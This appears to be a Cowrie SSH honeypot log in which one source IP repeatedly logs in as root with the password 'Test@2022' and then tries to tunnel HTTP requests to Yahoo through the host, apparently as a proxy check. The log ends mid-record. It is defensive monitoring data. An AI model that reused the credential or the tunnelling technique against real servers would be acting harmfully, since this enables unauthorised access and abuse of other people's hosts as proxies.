{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:21.532279Z","src_ip":"213.209.150.239","session":"3f04811ed48b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:21.768088Z","src_ip":"213.209.150.239","session":"3f04811ed48b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":8262,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:8262","sensor":"my-vps","timestamp":"2025-08-26T01:00:21.817699Z","session":"3f04811ed48b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:21.865445Z","src_ip":"213.209.150.239","session":"3f04811ed48b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":12542,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:12542","sensor":"my-vps","timestamp":"2025-08-26T01:00:22.001600Z","session":"3f04811ed48b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:22.049016Z","src_ip":"213.209.150.239","session":"3f04811ed48b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:22.097554Z","src_ip":"213.209.150.239","session":"3f04811ed48b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":8247,"dst_ip":"1.2.3.4","dst_port":22,"session":"e94d95fe58ed","protocol":"ssh","message":"New connection: 213.209.150.239:8247 (1.2.3.4:22) [session: e94d95fe58ed]","sensor":"my-vps","timestamp":"2025-08-26T01:00:22.143391Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:22.144299Z","src_ip":"213.209.150.239","session":"e94d95fe58ed"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:22.191437Z","src_ip":"213.209.150.239","session":"e94d95fe58ed"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:22.426631Z","src_ip":"213.209.150.239","session":"e94d95fe58ed"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":30876,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:30876","sensor":"my-vps","timestamp":"2025-08-26T01:00:22.474891Z","session":"e94d95fe58ed"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:22.522233Z","src_ip":"213.209.150.239","session":"e94d95fe58ed"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":27635,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:27635","sensor":"my-vps","timestamp":"2025-08-26T01:00:22.657593Z","session":"e94d95fe58ed"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:22.704958Z","src_ip":"213.209.150.239","session":"e94d95fe58ed"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:22.753288Z","src_ip":"213.209.150.239","session":"e94d95fe58ed"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":8286,"dst_ip":"1.2.3.4","dst_port":22,"session":"f465cb0f86ad","protocol":"ssh","message":"New connection: 213.209.150.239:8286 (1.2.3.4:22) [session: f465cb0f86ad]","sensor":"my-vps","timestamp":"2025-08-26T01:00:22.808842Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:22.811874Z","src_ip":"213.209.150.239","session":"f465cb0f86ad"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:22.868457Z","src_ip":"213.209.150.239","session":"f465cb0f86ad"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:23.150890Z","src_ip":"213.209.150.239","session":"f465cb0f86ad"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":14251,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:14251","sensor":"my-vps","timestamp":"2025-08-26T01:00:23.208436Z","session":"f465cb0f86ad"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:23.265249Z","src_ip":"213.209.150.239","session":"f465cb0f86ad"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":10357,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:10357","sensor":"my-vps","timestamp":"2025-08-26T01:00:23.420621Z","session":"f465cb0f86ad"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:23.478087Z","src_ip":"213.209.150.239","session":"f465cb0f86ad"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:23.536672Z","src_ip":"213.209.150.239","session":"f465cb0f86ad"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":8333,"dst_ip":"1.2.3.4","dst_port":22,"session":"7745b6ab44a1","protocol":"ssh","message":"New connection: 213.209.150.239:8333 (1.2.3.4:22) [session: 7745b6ab44a1]","sensor":"my-vps","timestamp":"2025-08-26T01:00:23.592301Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:23.593355Z","src_ip":"213.209.150.239","session":"7745b6ab44a1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:23.650060Z","src_ip":"213.209.150.239","session":"7745b6ab44a1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:23.932640Z","src_ip":"213.209.150.239","session":"7745b6ab44a1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":8712,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:8712","sensor":"my-vps","timestamp":"2025-08-26T01:00:23.990279Z","session":"7745b6ab44a1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:24.047220Z","src_ip":"213.209.150.239","session":"7745b6ab44a1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":737,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:737","sensor":"my-vps","timestamp":"2025-08-26T01:00:24.203100Z","session":"7745b6ab44a1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:24.260055Z","src_ip":"213.209.150.239","session":"7745b6ab44a1"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:24.317775Z","src_ip":"213.209.150.239","session":"7745b6ab44a1"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":8394,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1eb44d63a5a","protocol":"ssh","message":"New connection: 213.209.150.239:8394 (1.2.3.4:22) [session: d1eb44d63a5a]","sensor":"my-vps","timestamp":"2025-08-26T01:00:24.372941Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:24.373950Z","src_ip":"213.209.150.239","session":"d1eb44d63a5a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:24.430240Z","src_ip":"213.209.150.239","session":"d1eb44d63a5a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:24.712507Z","src_ip":"213.209.150.239","session":"d1eb44d63a5a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":789,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:789","sensor":"my-vps","timestamp":"2025-08-26T01:00:24.771026Z","session":"d1eb44d63a5a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:24.827965Z","src_ip":"213.209.150.239","session":"d1eb44d63a5a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":20160,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:20160","sensor":"my-vps","timestamp":"2025-08-26T01:00:24.983095Z","session":"d1eb44d63a5a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:25.039739Z","src_ip":"213.209.150.239","session":"d1eb44d63a5a"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:25.097203Z","src_ip":"213.209.150.239","session":"d1eb44d63a5a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":8445,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1ac61d61453","protocol":"ssh","message":"New connection: 213.209.150.239:8445 (1.2.3.4:22) [session: f1ac61d61453]","sensor":"my-vps","timestamp":"2025-08-26T01:00:25.143319Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:25.144190Z","src_ip":"213.209.150.239","session":"f1ac61d61453"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH